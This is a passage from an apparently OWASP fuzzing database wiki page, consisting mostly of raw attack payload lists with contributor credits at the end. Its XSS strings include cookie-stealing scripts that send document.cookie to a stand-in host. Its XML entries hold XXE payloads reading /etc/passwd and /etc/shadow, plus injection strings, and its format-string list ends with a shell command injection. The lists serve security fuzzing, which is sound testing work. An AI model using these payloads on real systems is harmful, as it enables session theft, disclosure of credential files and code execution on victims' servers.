&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
